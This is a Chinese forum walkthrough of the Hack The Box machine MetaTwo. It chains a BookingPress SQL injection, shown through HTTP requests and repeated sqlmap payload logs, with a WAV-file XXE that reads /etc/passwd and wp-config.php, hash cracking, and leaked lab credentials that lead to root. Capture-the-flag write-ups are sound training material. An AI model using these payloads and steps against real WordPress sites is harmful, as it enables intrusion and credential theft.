[原创]HTB MetaTwo (easy)-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[原创]HTB MetaTwo (easy)
发表于: 2022-12-4 00:41 938
[原创]HTB MetaTwo (easy)

hml189
2022-12-4 00:41
938
参考原文：https://0xdedinfosec.vercel.app/blog/hackthebox-metatwo-writeup
开启了21 22 80
网址为http://metapress.htb/
安装Wappalyzer可以看到网站信息

查看源码后可以看到wordpress插件信息

查找对应插件版本的漏洞
CVE-2022-0739
https ://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
该CVE有POC，根据POC先周到_wpnonce的值

bp抓包下来保存为admin.req
处理admin.req中的注入参数
列出所有databases
列出数据库 blog的table
dump wp_users表

解一下密码
成功跑出了密码partylikearockstar
 
跑一下目录
 
使用manager账户密码在wp-admin登录

查找对应版本的漏洞CVE-2021-29447
 https://tryhackme.com/room/wordpresscve202129447
我们需要创建一个WAV文件，该文件将获取另一个名为的文件dedsec.dtd，其中包含我们的恶意代码
启动PHP服务器
 
得到了/etc/passwd
 
让我们获取 WordPresswp-config.php文件
 
得到了路径/var/www/metapress.htb/blog
 
FTP用户创建
用户名：metapress.htb
密码：9NYS_ii@FyL_p5M2NvJ

获得了send_email.php，查看文件获得Jnelson 用户密码Cb4_JmWM8zUZWMu@Ys

ssh jnelson@10.10.11.186

发现passpie
通过 google 搜索passpie得到一个Command-line password manager用 python 编写的工具https ://github.com/marcwebbie/passpie

来 尝试破解key

将key下载下来
 
留下私钥
转成john格式
 
获得密码blink182

获得root密码 p7qfAZt4_A1xo_0x
su root
cd ~
cat root.txt

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb

User-Agent: curl/7.84.0

Accept: */*

Content-Length: 185

Content-Type: application/x-www-form-urlencoded
Connection: close
 
action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb

User-Agent: curl/7.84.0

Accept: */*

Content-Length: 185

Content-Type: application/x-www-form-urlencoded
Connection: close
 
action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1

$ sqlmap -r admin.req -p total_service --batch

[*] starting @ 08:54:24 /2022-12-03/
 
[08:54:24] [INFO] parsing HTTP request from 'admin.req'

[08:54:25] [INFO] testing connection to the target URL

[08:54:28] [INFO] checking if the target is protected by some kind of WAF/IPS

[08:54:29] [INFO] testing if the target URL content is stable

[08:54:30] [INFO] target URL content is stable

[08:54:31] [WARNING] heuristic (basic) test shows that POST parameter 'total_service' might not be injectable

[08:54:33] [INFO] testing for SQL injection on POST parameter 'total_service'

[08:54:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[08:54:39] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'

[08:54:41] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'

[08:54:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[08:54:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'

[08:54:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[08:55:04] [INFO] testing 'Generic inline queries'

[08:55:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'

[08:55:05] [WARNING] time-based comparison requires larger statistical model, please wait. (done)                          

[08:55:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'

[08:55:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'

[08:55:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'

[08:55:36] [INFO] POST parameter 'total_service' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y

[08:55:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'

[08:55:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

[08:56:06] [INFO] target URL appears to be UNION injectable with 9 columns

[08:56:12] [INFO] POST parameter 'total_service' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable

POST parameter 'total_service' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:

---
Parameter: total_service (POST)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query

    Title: Generic UNION query (NULL) - 9 columns

    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

---

[08:56:12] [INFO] the back-end DBMS is MySQL

web application technology: Nginx 1.18.0, PHP 8.0.24

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

[08:56:13] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'
 
[*] ending @ 08:56:13 /2022-12-03/

$ sqlmap -r admin.req -p total_service --batch

[*] starting @ 08:54:24 /2022-12-03/
 
[08:54:24] [INFO] parsing HTTP request from 'admin.req'

[08:54:25] [INFO] testing connection to the target URL

[08:54:28] [INFO] checking if the target is protected by some kind of WAF/IPS

[08:54:29] [INFO] testing if the target URL content is stable

[08:54:30] [INFO] target URL content is stable

[08:54:31] [WARNING] heuristic (basic) test shows that POST parameter 'total_service' might not be injectable

[08:54:33] [INFO] testing for SQL injection on POST parameter 'total_service'

[08:54:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[08:54:39] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'

[08:54:41] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'

[08:54:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[08:54:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'

[08:54:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[08:55:04] [INFO] testing 'Generic inline queries'

[08:55:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'

[08:55:05] [WARNING] time-based comparison requires larger statistical model, please wait. (done)                          

[08:55:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'

[08:55:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'

[08:55:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'

[08:55:36] [INFO] POST parameter 'total_service' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y

[08:55:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'

[08:55:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

[08:56:06] [INFO] target URL appears to be UNION injectable with 9 columns

[08:56:12] [INFO] POST parameter 'total_service' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable

POST parameter 'total_service' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:

---
Parameter: total_service (POST)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query

    Title: Generic UNION query (NULL) - 9 columns

    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

---

[08:56:12] [INFO] the back-end DBMS is MySQL

web application technology: Nginx 1.18.0, PHP 8.0.24

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

[08:56:13] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'
 
[*] ending @ 08:56:13 /2022-12-03/

$ sqlmap -r admin.req -p total_service --dbs

[*] starting @ 08:56:32 /2022-12-03/
 
[08:56:32] [INFO] parsing HTTP request from 'admin.req'

[08:56:32] [INFO] resuming back-end DBMS 'mysql'

[08:56:32] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---
Parameter: total_service (POST)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query

    Title: Generic UNION query (NULL) - 9 columns

    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

---

[08:56:33] [INFO] the back-end DBMS is MySQL

web application technology: Nginx 1.18.0, PHP 8.0.24

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

[08:56:33] [INFO] fetching database names

available databases [2]:

[*] blog

[*] information_schema
 
[08:56:34] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'
 
[*] ending @ 08:56:34 /2022-12-03/

$ sqlmap -r admin.req -p total_service --dbs

[*] starting @ 08:56:32 /2022-12-03/
 
[08:56:32] [INFO] parsing HTTP request from 'admin.req'

[08:56:32] [INFO] resuming back-end DBMS 'mysql'

[08:56:32] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---
Parameter: total_service (POST)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query

    Title: Generic UNION query (NULL) - 9 columns

    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

---

[08:56:33] [INFO] the back-end DBMS is MySQL

web application technology: Nginx 1.18.0, PHP 8.0.24

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

[08:56:33] [INFO] fetching database names

available databases [2]:

[*] blog

[*] information_schema
 
[08:56:34] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'
 
[*] ending @ 08:56:34 /2022-12-03/

$ sqlmap -r admin.req -p total_service -D blog --tables

[*] starting @ 08:59:43 /2022-12-03/
 
[08:59:43] [INFO] parsing HTTP request from 'admin.req'

[08:59:43] [INFO] resuming back-end DBMS 'mysql'

[08:59:43] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---
Parameter: total_service (POST)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query

    Title: Generic UNION query (NULL) - 9 columns

    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

---

[08:59:45] [INFO] the back-end DBMS is MySQL

web application technology: Nginx 1.18.0, PHP 8.0.24

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

[08:59:45] [INFO] fetching tables for database: 'blog'
Database: blog

[27 tables]

+--------------------------------------+
| wp_bookingpress_appointment_bookings |
| wp_bookingpress_categories           |
| wp_bookingpress_customers            |
| wp_bookingpress_customers_meta       |
| wp_bookingpress_customize_settings   |
| wp_bookingpress_debug_payment_log    |
| wp_bookingpress_default_daysoff      |
| wp_bookingpress_default_workhours    |
| wp_bookingpress_entries              |
| wp_bookingpress_form_fields          |
| wp_bookingpress_notifications        |
| wp_bookingpress_payment_logs         |
| wp_bookingpress_services             |
| wp_bookingpress_servicesmeta         |
| wp_bookingpress_settings             |
| wp_commentmeta                       |
| wp_comments                          |
| wp_links                             |
| wp_options                           |
| wp_postmeta                          |
| wp_posts                             |
| wp_term_relationships                |
| wp_term_taxonomy                     |
| wp_termmeta                          |
| wp_terms                             |
| wp_usermeta                          |
| wp_users                             |

+--------------------------------------+
 
[08:59:47] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'
 
[*] ending @ 08:59:47 /2022-12-03/

$ sqlmap -r admin.req -p total_service -D blog --tables

[*] starting @ 08:59:43 /2022-12-03/
 
[08:59:43] [INFO] parsing HTTP request from 'admin.req'

[08:59:43] [INFO] resuming back-end DBMS 'mysql'

[08:59:43] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---
Parameter: total_service (POST)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query

    Title: Generic UNION query (NULL) - 9 columns

    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

---

[08:59:45] [INFO] the back-end DBMS is MySQL

web application technology: Nginx 1.18.0, PHP 8.0.24

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

[08:59:45] [INFO] fetching tables for database: 'blog'
Database: blog

[27 tables]

+--------------------------------------+
| wp_bookingpress_appointment_bookings |
| wp_bookingpress_categories           |
| wp_bookingpress_customers            |
| wp_bookingpress_customers_meta       |
| wp_bookingpress_customize_settings   |
| wp_bookingpress_debug_payment_log    |
| wp_bookingpress_default_daysoff      |
| wp_bookingpress_default_workhours    |
| wp_bookingpress_entries              |
| wp_bookingpress_form_fields          |
| wp_bookingpress_notifications        |
| wp_bookingpress_payment_logs         |
| wp_bookingpress_services             |
| wp_bookingpress_servicesmeta         |
| wp_bookingpress_settings             |
| wp_commentmeta                       |
| wp_comments                          |
| wp_links                             |

				登录后可查看完整内容
			
[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

		最后于  2022-12-29 14:29		
				被hml189编辑
				
		，原因：